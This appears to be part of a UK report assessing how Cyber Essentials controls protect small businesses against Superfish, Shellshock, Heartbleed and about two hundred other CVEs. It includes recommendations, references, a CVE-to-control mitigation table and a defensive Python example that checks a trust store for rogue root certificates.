    The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.

CVE-2015-2077 [14]

This vulnerability is particularly interesting because the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' of the equipment, it remained undetected for a long time, and it hints that there may be further, as yet undiscovered, weaknesses in both Lenovo's and other manufacturers' equipment.

The vector is the Superfish software breaking the chain of trust for SSL certificates by installing its own self-signed root CA certificate into the host machine's list of trusted certificates. The private key for that root is the same on every installation, so it can be recovered from any other machine running Superfish; an attacker holding it can sign a certificate for any server name, the target machine will accept it, and the attacker gains full access to any SSL-secured connection from that machine.

Thankfully, while the risk to users and SMEs was high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and the issue is mitigated through the Cyber Essentials patch management advice provided that administrators know the tool has to be run.
Threat Analysis

ShellShock. Without Cyber Essentials in place, SME 1 and 2 would be at risk from Shellshock, as they both operate Unix/Linux-based systems that would require patching to close the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them both unable to determine their vulnerability and unable to remedy it.

With Cyber Essentials, SME 1 and 2 would be fully protected, and it is likely that SME 3 and 4 are also protected if the external providers also follow Cyber Essentials or another security and patching scheme.

Heartbleed. The Heartbleed bug is another vulnerability that, without the Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and the application of access controls from the Cyber Essentials guidelines, provided that the affected OpenSSL instances are under the SME's control or its service providers patch them.

SuperFish. All of the SMEs we interviewed could be exceedingly vulnerable to the Superfish issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in closing this vulnerability, as it would require the administrators to be aware of the issue and to know of the removal tool, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, Cyber Essentials patch management fully mitigates it.
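The two Superfish passages above make the same point: the exposure lives in the host's trusted root store, which operating system patching never revisits, so an administrator has to look for it deliberately. As an added example (not from the report or from Lenovo's removal tool), the Python below compares the certificates in a trust store against a known-good baseline and reports any self-issued root that the baseline does not contain. The store and baseline entries are constructed in the dict shape that Python's ssl.SSLContext.get_ca_certs() returns, with arbitrary serial numbers; the sample rogue entry carries the organisation name the Superfish root used, and live_roots() shows how to obtain the real list from the interpreter's default context.

```python
"""Report trusted root certificates that a known-good baseline does not contain.

Added example; not code from the report or from Lenovo's Superfish removal
tool. Superfish (CVE-2015-2077) put a self-signed root CA, with the same
private key on every machine, into the host's trusted roots. Operating system
updates never revisit that list, so the control here is a deliberate diff of
the live trust store against a baseline captured from a clean build.
Certificates use the dict shape returned by ssl.SSLContext.get_ca_certs().
"""
import ssl


def name_to_dict(rdns):
    """Flatten ((('organizationName', 'X'),), (('commonName', 'Y'),)) to a dict."""
    return {attr: value for rdn in rdns for attr, value in rdn}


def is_self_issued(cert) -> bool:
    """A root CA certificate is issued to itself (subject == issuer)."""
    return name_to_dict(cert["subject"]) == name_to_dict(cert["issuer"])


def cert_key(cert):
    """Identity for comparison: issuer organisation, issuer CN, serial number."""
    issuer = name_to_dict(cert["issuer"])
    return (issuer.get("organizationName", ""),
            issuer.get("commonName", ""),
            cert["serialNumber"])


def unexpected_roots(store, baseline):
    """Self-issued certificates present in `store` but absent from `baseline`."""
    known = {cert_key(c) for c in baseline}
    return [c for c in store if is_self_issued(c) and cert_key(c) not in known]


def live_roots():
    """Roots loaded by this interpreter's default TLS context. On Windows,
    ssl.enum_certificates("ROOT") reaches the system store that Superfish
    modified, but it returns DER blobs needing a parser, so it is not used here."""
    return ssl.create_default_context().get_ca_certs()


# Constructed baseline and store; serial numbers are arbitrary.
def _cert(org, cn, serial, issuer=None):
    subject = ((("organizationName", org),), (("commonName", cn),))
    return {"subject": subject, "issuer": issuer if issuer else subject,
            "serialNumber": serial, "version": 3,
            "notBefore": "Jan  1 00:00:00 2014 GMT",
            "notAfter": "Jan  1 00:00:00 2034 GMT"}


BASELINE = [
    _cert("Example Trust Services", "Example Root CA", "1001"),
    _cert("Example Trust Services", "Example Root CA 2", "1002"),
]

STORE = BASELINE + [
    # the interception root; name as carried by the Superfish certificate
    _cert("Superfish, Inc.", "Superfish, Inc.", "1003"),
    # an intermediate signed by a baseline root: not self-issued, so not flagged
    _cert("Example Trust Services", "Example Issuing CA", "1004",
          issuer=BASELINE[0]["subject"]),
]


def report(store, baseline):
    """Human-readable lines for each unexpected root."""
    return [f"unexpected root: {name_to_dict(c['subject']).get('commonName')} "
            f"(serial {c['serialNumber']})" for c in unexpected_roots(store, baseline)]


if __name__ == "__main__":
    for line in report(STORE, BASELINE):
        print(line)
    print(f"{len(live_roots())} roots loaded in this interpreter's default context")
```

The baseline is the part that needs care: capture it from a freshly imaged machine before any vendor bundleware runs, because a baseline taken from an already-shipped laptop would have included the Superfish root and the diff would report nothing.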
Conclusions

The Cyber Essentials security controls have been shown to mitigate, or to mitigate as soon as a patch is released, all of the vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two-hundred vulnerabilities collected, eight could not be resolved by deploying security patches; for vulnerabilities such as these the only mitigation available is simply not to install the affected systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope. It is important to consider that the scope of this study covers only internet-based, commodity-level attacks, and although the Cyber Essentials controls perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention: not only malicious acts, but also users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry, and finance.
Additional Tools

The 10 Steps to Cyber Security [2] identifies additional security measures that complement the Cyber Essentials scheme well, delivering additional security through indirect measures such as User Education and Awareness along with Network and Systems Monitoring. User education bolsters cyber security by equipping each employee of the SME with the necessary knowledge of safe practice, its importance, and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, file access and other activity to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for larger organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on here, but also to provide evidence for any potential cyber-crime investigation.

There exist some collective approaches to improving cyber-security; a notable example is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber-security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful for quickly identifying potential vulnerabilities and available patches, which, as shown in this report, is critical for the CE patch management control to fully mitigate the related vulnerabilities.

An important note must be made regarding the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be applying a high level of scrutiny to their security practice and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (around 600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring that all trading partners uphold the same high levels of security.
Cyber Essentials Controls

Of the five current Cyber Essentials controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses ranked patch management last in use among SMEs. The controls most used at present are those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewalls. Patch management, by contrast, is not necessarily understood by individuals as a tool that greatly improves cyber-security.

Anti-Malware was useful in mitigating the fewest vulnerabilities (10%). It is, however, important to note that anti-malware is largely the only security tool that routinely scans the network, hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation's cyber-safety.
Recommendations

To further improve cyber-security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental or collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attack mentioned above, which were not within the scope of this report.
References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, and Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, and Department for Business, Innovation & Skills. Cyber-security Information Sharing Partnership (CiSP). https://www.cert.gov.uk/cisp/, March 2013.

[5] CREST. Cyber Essentials certified companies. http://www.cyberessentials.org/list, March 2015.

[6] CVE.Mitre.org. Terminology. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber Essentials scheme: overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, Department for Business, Innovation & Skills. Common cyber attacks: reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North West cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.

[10] HM Government. Cyber Essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160, aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271, aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077, aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy: protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.
Cyber Controls Applicability

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management
CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration
CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (no JS)
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | m | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls (include anti-DOS)
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall, Anti-DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
